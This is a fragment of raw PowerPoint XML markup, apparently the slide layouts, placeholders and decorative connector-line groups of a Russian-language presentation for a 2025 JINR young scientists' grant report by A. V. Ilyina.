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5"/>
  </p:notesMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="256" r:id="rId3"/>
    <p:sldId id="30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07" r:id="rId24"/>
    <p:sldId id="277" r:id="rId25"/>
    <p:sldId id="308" r:id="rId26"/>
    <p:sldId id="278" r:id="rId27"/>
    <p:sldId id="279" r:id="rId28"/>
    <p:sldId id="280" r:id="rId29"/>
    <p:sldId id="305" r:id="rId30"/>
    <p:sldId id="281" r:id="rId31"/>
    <p:sldId id="282" r:id="rId32"/>
    <p:sldId id="306" r:id="rId33"/>
    <p:sldId id="284" r:id="rId34"/>
    <p:sldId id="283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304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1" r:id="rId52"/>
    <p:sldId id="300" r:id="rId53"/>
    <p:sldId id="302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83" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr snapToGrid="0">
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="95" d="100"/>
          <a:sy n="95" d="100"/>
        </p:scale>
        <p:origin x="1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move the slide</a:t>
            </a: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</a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24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250" name="PlaceHolder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" idx="5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251" name="PlaceHolder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" idx="5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252" name="PlaceHolder 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" idx="5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87C86C46-B536-4023-AD3E-91DF8082B23B}" type="slidenum"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fld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52"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" algn="r">
              <a:buNone/>
            </a:pPr>
            <a:fld id="{87C86C46-B536-4023-AD3E-91DF8082B23B}" type="slidenum">
              <a:rPr lang="ru-RU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</a:t>
            </a:fld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3324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93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2" name="PlaceHolder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" idx="95"/>
          </p:nvPr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E422FB0-F072-4C9A-91DE-7C9E2ABA6DD1}" type="slidenum"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rPr>
              <a:t>51</a:t>
            </a:fld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085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8" name="PlaceHolder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" idx="97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66BE558-7E45-4FC2-B367-A80F8BD41BC9}" type="slidenum">
              <a:rPr lang="ru-RU" sz="12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rPr>
              <a:t>52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52"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" algn="r">
              <a:buNone/>
            </a:pPr>
            <a:fld id="{87C86C46-B536-4023-AD3E-91DF8082B23B}" type="slidenum">
              <a:rPr lang="ru-RU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21</a:t>
            </a:fld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4010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52"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" algn="r">
              <a:buNone/>
            </a:pPr>
            <a:fld id="{87C86C46-B536-4023-AD3E-91DF8082B23B}" type="slidenum">
              <a:rPr lang="ru-RU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22</a:t>
            </a:fld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357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52"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" algn="r">
              <a:buNone/>
            </a:pPr>
            <a:fld id="{87C86C46-B536-4023-AD3E-91DF8082B23B}" type="slidenum">
              <a:rPr lang="ru-RU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360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52"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" algn="r">
              <a:buNone/>
            </a:pPr>
            <a:fld id="{87C86C46-B536-4023-AD3E-91DF8082B23B}" type="slidenum">
              <a:rPr lang="ru-RU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32</a:t>
            </a:fld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9112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9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6" name="PlaceHolder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" idx="93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>
              <a:buNone/>
            </a:pPr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52"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" algn="r">
              <a:buNone/>
            </a:pPr>
            <a:fld id="{87C86C46-B536-4023-AD3E-91DF8082B23B}" type="slidenum">
              <a:rPr lang="ru-RU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42</a:t>
            </a:fld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9768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085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9" name="PlaceHolder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" idx="94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FACD4F5-85B4-4A0F-9C5C-CD5F0FD4E60C}" type="slidenum">
              <a:rPr lang="ru-RU" sz="12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rPr>
              <a:t>49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085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5" name="PlaceHolder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" idx="96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945BD75-92C0-4AC0-8095-5DB8C5B3C663}" type="slidenum">
              <a:rPr lang="ru-RU" sz="12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rPr>
              <a:t>50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бъект с подписью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4" name="Прямоугольник 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="628668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0120" cy="1598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0040" cy="4871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0120" cy="380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6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0C8CF46-4B5E-4264-8586-967F992D1248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Заголовок 1"/>
          <p:cNvSpPr/>
          <p:nvPr/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раздел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83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3440" cy="2850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6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3440" cy="1497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5ACBBEE-31DC-4228-9594-2D82270EA081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Два объект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0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1" name="Прямоугольник 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="628668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2" name="PlaceHolder 1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79320" cy="4349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79320" cy="4349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3A854E0-338F-4915-A07E-082F5C41B050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7" name="Прямоугольник 8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равнени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00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01" name="Прямоугольник 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="628668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02" name="PlaceHolder 1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5560" cy="82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5560" cy="3682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1120" cy="82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1120" cy="3682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dt" idx="34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7" name="PlaceHolder 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" idx="35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8" name="PlaceHolder 7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" idx="36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3CF04CE-9841-47BB-A1C3-BD5DCCB4C169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9" name="Прямоугольник 10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0" name="PlaceHolder 8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Заголовок и объек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2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3" name="Прямоугольник 7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4" name="Прямоугольник 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="628668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304920" y="876240"/>
            <a:ext cx="11608920" cy="5298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 idx="40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ftr" idx="41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sldNum" idx="42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5DC43E9-9CDC-40C5-9AE3-5B8DF5E34863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2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3" name="Прямоугольник 7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4" name="Прямоугольник 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="628668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304920" y="876240"/>
            <a:ext cx="11608920" cy="5298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dt" idx="37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ftr" idx="38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sldNum" idx="39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350C8F-A2C1-42B3-A53C-4E45246C95A5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Только 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6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7" name="Прямоугольник 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="628668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8" name="PlaceHolder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" idx="43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ftr" idx="44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sldNum" idx="45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4513ADB-5F7C-4328-985B-13CA0AABC293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1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35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36" name="PlaceHolder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" idx="46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ftr" idx="47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sldNum" idx="48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7F4F91-5F0E-4C3E-8957-D6DCDAC20E6A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0640" cy="397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9"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{BAA37919-6940-46F7-95F6-A234C15D201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исунок с подписью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3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4" name="Прямоугольник 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="628668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0120" cy="1598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0040" cy="4871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0120" cy="380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5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6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F2D7140-8AB8-44EB-97DD-E3F28F5B01F9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2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3" name="Прямоугольник 7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840" cy="2385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6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8A92EFE-9088-4D4D-975C-C4DE1916187D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0640" cy="397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и вертикальный текс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0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1" name="Прямоугольник 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="628668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2" name="PlaceHolder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="304920" y="876240"/>
            <a:ext cx="11608920" cy="5298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BE080A5-BACC-4F53-A4E3-C2C48A358AE8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Заголовок 1"/>
          <p:cNvSpPr/>
          <p:nvPr/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9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40" name="Прямоугольник 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="628668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6920" cy="5809680"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="eaVert" lIns="45000" tIns="90000" rIns="45000" bIns="9000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2080" cy="58096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603507B-A825-430C-B9C0-3E235F8E99C0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8" hidden="1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47" name="Прямоугольник 6" hidden="1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48" name="Rectangle 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3240" y="6400800"/>
            <a:ext cx="12186720" cy="455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9" name="Rectangle 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="6334200"/>
            <a:ext cx="12186720" cy="61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9080" rIns="90000" bIns="1908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03.12.2025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Ильина А. В. Отчет о выполнении работ, финансируемых грантом молодых ученых и специалистов ОИЯИ за 2025 год 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150150-7BA8-47C6-86D6-04EF155535E7}" type="slidenum"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fld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title text format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0640" cy="397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и объек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6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7" name="Прямоугольник 7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8" name="Прямоугольник 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="628668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04920" y="876240"/>
            <a:ext cx="11608920" cy="5298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79AF6D8-2FC1-4C2C-BF80-25AD2DA2DDCE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5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6" name="Прямоугольник 7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7" name="Прямоугольник 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="628668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304920" y="876240"/>
            <a:ext cx="11608920" cy="5298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6B9EBC8-5470-4FEE-AFFD-0C5FBBF2136E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aul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рямоугольник 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="626112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74" name="Прямоугольник 6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75" name="Прямоугольник 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="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76" name="Прямоугольник 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="6286680"/>
            <a:ext cx="12189960" cy="57888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304920" y="876240"/>
            <a:ext cx="11608920" cy="5298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Группа 95"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="0" y="-195840"/>
            <a:ext cx="12192480" cy="6858360"/>
            <a:chOff x="0" y="-195840"/>
            <a:chExt cx="12192480" cy="6858360"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="142" name="Прямая соединительная линия 96"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="609840" y="-195840"/>
              <a:ext cx="1080" cy="685872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43" name="Прямая соединительная линия 97"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1829160" y="-195840"/>
              <a:ext cx="1080" cy="685872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44" name="Прямая соединительная линия 98"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3048120" y="-195840"/>
              <a:ext cx="1080" cy="685872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45" name="Прямая соединительная линия 99"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4267440" y="-195840"/>
              <a:ext cx="1080" cy="685872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46" name="Прямая соединительная линия 100"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5486400" y="-195840"/>
              <a:ext cx="1080" cy="685872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47" name="Прямая соединительная линия 101"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6705720" y="-195840"/>
              <a:ext cx="1080" cy="685872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48" name="Прямая соединительная линия 102"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7924680" y="-195840"/>
              <a:ext cx="1080" cy="685872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49" name="Прямая соединительная линия 103"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="9144000" y="-195840"/>
              <a:ext cx="1080" cy="685872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50" name="Прямая соединительная линия 104"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="10362960" y="-195840"/>
              <a:ext cx="1080" cy="685872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51" name="Прямая соединительная линия 105"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="11582280" y="-195840"/>
              <a:ext cx="1080" cy="685872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52" name="Прямая соединительная линия 106"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2520" y="190440"/>
              <a:ext cx="12190320" cy="108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53" name="Прямая соединительная линия 107"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2520" y="1415160"/>
              <a:ext cx="12190320" cy="108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54" name="Прямая соединительная линия 108"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2520" y="2639880"/>
              <a:ext cx="12190320" cy="108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55" name="Прямая соединительная линия 109"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2520" y="3864600"/>
              <a:ext cx="12190320" cy="108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56" name="Прямая соединительная линия 110"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2520" y="5089320"/>
              <a:ext cx="12190320" cy="108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cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="157" name="Прямая соединительная линия 111"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2520" y="6313680"/>
              <a:ext cx="12190320" cy="1080"/>
            </a:xfrm>
            <a:prstGeom prst="straightConnector1">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="0">
              <a:solidFill>
                <a:srgbClr val="D9D9D9">
                  <a:alpha val="25000"/>
                </a:srgbClr>
              </a:solidFill>
            </a:ln>
          </p:spPr>
        </p:cxnSp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="158" name="Группа 112"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="0" y="-195840"/>
              <a:ext cx="12192480" cy="6858360"/>
              <a:chOff x="0" y="-195840"/>
              <a:chExt cx="12192480" cy="6858360"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:cxnSp>
            <p:nvCxnSpPr>
              <p:cNvPr id="159" name="Прямая соединительная линия 130"/>
              <p:cNvCxnSpPr/>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="225360" y="-195840"/>
                <a:ext cx="6816960" cy="68587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60" name="Прямая соединительная линия 131"/>
              <p:cNvCxnSpPr/>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="1449000" y="-195840"/>
                <a:ext cx="6816960" cy="68587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61" name="Прямая соединительная линия 132"/>
              <p:cNvCxnSpPr/>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="2665800" y="-195840"/>
                <a:ext cx="6816960" cy="68587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62" name="Прямая соединительная линия 133"/>
              <p:cNvCxnSpPr/>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="3884760" y="-195840"/>
                <a:ext cx="6817320" cy="68587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63" name="Прямая соединительная линия 134"/>
              <p:cNvCxnSpPr/>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="5106240" y="-195840"/>
                <a:ext cx="6816960" cy="68587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grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="164" name="Группа 135"/>
              <p:cNvGrpSpPr/>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr>
              <a:xfrm>
                <a:off x="6327720" y="-195840"/>
                <a:ext cx="5864760" cy="5898960"/>
                <a:chOff x="6327720" y="-195840"/>
                <a:chExt cx="5864760" cy="5898960"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:cxnSp>
              <p:nvCxnSpPr>
                <p:cNvPr id="165" name="Прямая соединительная линия 141"/>
                <p:cNvCxnSpPr/>
                <p:nvPr/>
              </p:nvCxnSpPr>
              <p:spPr>
                <a:xfrm>
                  <a:off x="6327720" y="-195840"/>
                  <a:ext cx="5865120" cy="589932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25000"/>
                    </a:srgbClr>
                  </a:solidFill>
                </a:ln>
              </p:spPr>
            </p:cxnSp>
            <p:cxnSp>
              <p:nvCxnSpPr>
                <p:cNvPr id="166" name="Прямая соединительная линия 142"/>
                <p:cNvCxnSpPr/>
                <p:nvPr/>
              </p:nvCxnSpPr>
              <p:spPr>
                <a:xfrm>
                  <a:off x="7549200" y="-195840"/>
                  <a:ext cx="4643640" cy="467316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25000"/>
                    </a:srgbClr>
                  </a:solidFill>
                </a:ln>
              </p:spPr>
            </p:cxnSp>
            <p:cxnSp>
              <p:nvCxnSpPr>
                <p:cNvPr id="167" name="Прямая соединительная линия 143"/>
                <p:cNvCxnSpPr/>
                <p:nvPr/>
              </p:nvCxnSpPr>
              <p:spPr>
                <a:xfrm>
                  <a:off x="8772840" y="-195840"/>
                  <a:ext cx="3420000" cy="345744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25000"/>
                    </a:srgbClr>
                  </a:solidFill>
                </a:ln>
              </p:spPr>
            </p:cxnSp>
            <p:cxnSp>
              <p:nvCxnSpPr>
                <p:cNvPr id="168" name="Прямая соединительная линия 144"/>
                <p:cNvCxnSpPr/>
                <p:nvPr/>
              </p:nvCxnSpPr>
              <p:spPr>
                <a:xfrm>
                  <a:off x="9982080" y="-195840"/>
                  <a:ext cx="2210760" cy="222732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25000"/>
                    </a:srgbClr>
                  </a:solidFill>
                </a:ln>
              </p:spPr>
            </p:cxnSp>
            <p:cxnSp>
              <p:nvCxnSpPr>
                <p:cNvPr id="169" name="Прямая соединительная линия 145"/>
                <p:cNvCxnSpPr/>
                <p:nvPr/>
              </p:nvCxnSpPr>
              <p:spPr>
                <a:xfrm>
                  <a:off x="11198880" y="-195840"/>
                  <a:ext cx="993960" cy="100332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25000"/>
                    </a:srgbClr>
                  </a:solidFill>
                </a:ln>
              </p:spPr>
            </p:cxnSp>
          </p:grpSp>
          <p:cxnSp>
            <p:nvCxnSpPr>
              <p:cNvPr id="170" name="Прямая соединительная линия 136"/>
              <p:cNvCxnSpPr/>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr>
              <a:xfrm flipH="1" flipV="1">
                <a:off x="0" y="815760"/>
                <a:ext cx="5829840" cy="58471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71" name="Прямая соединительная линия 137"/>
              <p:cNvCxnSpPr/>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr>
              <a:xfrm flipH="1" flipV="1">
                <a:off x="0" y="2031120"/>
                <a:ext cx="4615560" cy="463176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72" name="Прямая соединительная линия 138"/>
              <p:cNvCxnSpPr/>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr>
              <a:xfrm flipH="1" flipV="1">
                <a:off x="0" y="3236040"/>
                <a:ext cx="3399480" cy="342684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73" name="Прямая соединительная линия 139"/>
              <p:cNvCxnSpPr/>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr>
              <a:xfrm flipH="1" flipV="1">
                <a:off x="0" y="4455360"/>
                <a:ext cx="2197440" cy="22075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74" name="Прямая соединительная линия 140"/>
              <p:cNvCxnSpPr/>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr>
              <a:xfrm flipH="1" flipV="1">
                <a:off x="0" y="5668200"/>
                <a:ext cx="987840" cy="99468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</p:grpSp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="175" name="Группа 113"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="0" y="-195840"/>
              <a:ext cx="12192480" cy="6858360"/>
              <a:chOff x="0" y="-195840"/>
              <a:chExt cx="12192480" cy="6858360"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:cxnSp>
            <p:nvCxnSpPr>
              <p:cNvPr id="176" name="Прямая соединительная линия 114"/>
              <p:cNvCxnSpPr/>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr>
              <a:xfrm flipH="1">
                <a:off x="5150520" y="-195840"/>
                <a:ext cx="6816960" cy="68587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77" name="Прямая соединительная линия 115"/>
              <p:cNvCxnSpPr/>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr>
              <a:xfrm flipH="1">
                <a:off x="3926880" y="-195840"/>
                <a:ext cx="6816960" cy="68587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78" name="Прямая соединительная линия 116"/>
              <p:cNvCxnSpPr/>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr>
              <a:xfrm flipH="1">
                <a:off x="2710080" y="-195840"/>
                <a:ext cx="6816960" cy="68587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79" name="Прямая соединительная линия 117"/>
              <p:cNvCxnSpPr/>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr>
              <a:xfrm flipH="1">
                <a:off x="1490760" y="-195840"/>
                <a:ext cx="6816960" cy="68587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80" name="Прямая соединительная линия 118"/>
              <p:cNvCxnSpPr/>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr>
              <a:xfrm flipH="1">
                <a:off x="269280" y="-195840"/>
                <a:ext cx="6816960" cy="68587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grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="181" name="Группа 119"/>
              <p:cNvGrpSpPr/>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr>
              <a:xfrm>
                <a:off x="0" y="-195840"/>
                <a:ext cx="5864760" cy="5898960"/>
                <a:chOff x="0" y="-195840"/>
                <a:chExt cx="5864760" cy="5898960"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:cxnSp>
              <p:nvCxnSpPr>
                <p:cNvPr id="182" name="Прямая соединительная линия 125"/>
                <p:cNvCxnSpPr/>
                <p:nvPr/>
              </p:nvCxnSpPr>
              <p:spPr>
                <a:xfrm flipH="1">
                  <a:off x="0" y="-195840"/>
                  <a:ext cx="5865120" cy="589932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25000"/>
                    </a:srgbClr>
                  </a:solidFill>
                </a:ln>
              </p:spPr>
            </p:cxnSp>
            <p:cxnSp>
              <p:nvCxnSpPr>
                <p:cNvPr id="183" name="Прямая соединительная линия 126"/>
                <p:cNvCxnSpPr/>
                <p:nvPr/>
              </p:nvCxnSpPr>
              <p:spPr>
                <a:xfrm flipH="1">
                  <a:off x="0" y="-195840"/>
                  <a:ext cx="4643640" cy="467316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25000"/>
                    </a:srgbClr>
                  </a:solidFill>
                </a:ln>
              </p:spPr>
            </p:cxnSp>
            <p:cxnSp>
              <p:nvCxnSpPr>
                <p:cNvPr id="184" name="Прямая соединительная линия 127"/>
                <p:cNvCxnSpPr/>
                <p:nvPr/>
              </p:nvCxnSpPr>
              <p:spPr>
                <a:xfrm flipH="1">
                  <a:off x="0" y="-195840"/>
                  <a:ext cx="3420000" cy="345744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25000"/>
                    </a:srgbClr>
                  </a:solidFill>
                </a:ln>
              </p:spPr>
            </p:cxnSp>
            <p:cxnSp>
              <p:nvCxnSpPr>
                <p:cNvPr id="185" name="Прямая соединительная линия 128"/>
                <p:cNvCxnSpPr/>
                <p:nvPr/>
              </p:nvCxnSpPr>
              <p:spPr>
                <a:xfrm flipH="1">
                  <a:off x="0" y="-195840"/>
                  <a:ext cx="2210760" cy="222732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25000"/>
                    </a:srgbClr>
                  </a:solidFill>
                </a:ln>
              </p:spPr>
            </p:cxnSp>
            <p:cxnSp>
              <p:nvCxnSpPr>
                <p:cNvPr id="186" name="Прямая соединительная линия 129"/>
                <p:cNvCxnSpPr/>
                <p:nvPr/>
              </p:nvCxnSpPr>
              <p:spPr>
                <a:xfrm flipH="1">
                  <a:off x="0" y="-195840"/>
                  <a:ext cx="993960" cy="100332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25000"/>
                    </a:srgbClr>
                  </a:solidFill>
                </a:ln>
              </p:spPr>
            </p:cxnSp>
          </p:grpSp>
          <p:cxnSp>
            <p:nvCxnSpPr>
              <p:cNvPr id="187" name="Прямая соединительная линия 120"/>
              <p:cNvCxnSpPr/>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr>
              <a:xfrm flipV="1">
                <a:off x="6363000" y="815760"/>
                <a:ext cx="5829840" cy="58471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88" name="Прямая соединительная линия 121"/>
              <p:cNvCxnSpPr/>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr>
              <a:xfrm flipV="1">
                <a:off x="7576920" y="2031120"/>
                <a:ext cx="4615920" cy="463176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89" name="Прямая соединительная линия 122"/>
              <p:cNvCxnSpPr/>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr>
              <a:xfrm flipV="1">
                <a:off x="8793360" y="3236040"/>
                <a:ext cx="3399480" cy="342684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90" name="Прямая соединительная линия 123"/>
              <p:cNvCxnSpPr/>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr>
              <a:xfrm flipV="1">
                <a:off x="9995400" y="4455360"/>
                <a:ext cx="2197440" cy="220752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  <p:cxnSp>
            <p:nvCxnSpPr>
              <p:cNvPr id="191" name="Прямая соединительная линия 124"/>
              <p:cNvCxnSpPr/>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr>
              <a:xfrm flipV="1">
                <a:off x="11204640" y="5668200"/>
                <a:ext cx="988200" cy="994680"/>
              </a:xfrm>
              <a:prstGeom prst="straightConnector1">
                <a:avLst/>
              </a:prstGeom>
              <a:ln w="0">
                <a:solidFill>
                  <a:srgbClr val="D9D9D9">
                    <a:alpha val="25000"/>
                  </a:srgbClr>
                </a:solidFill>
              </a:ln>
            </p:spPr>
          </p:cxnSp>
        </p:grpSp>
      </p:grpSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="192" name="Прямая соединительная линия 147"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609480" y="6172200"/>
            <a:ext cx="10973880" cy="1080"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:solidFill>
              <a:srgbClr val="0B5394"/>
            </a:solidFill>
            <a:round/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="193" name="Группа 160"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
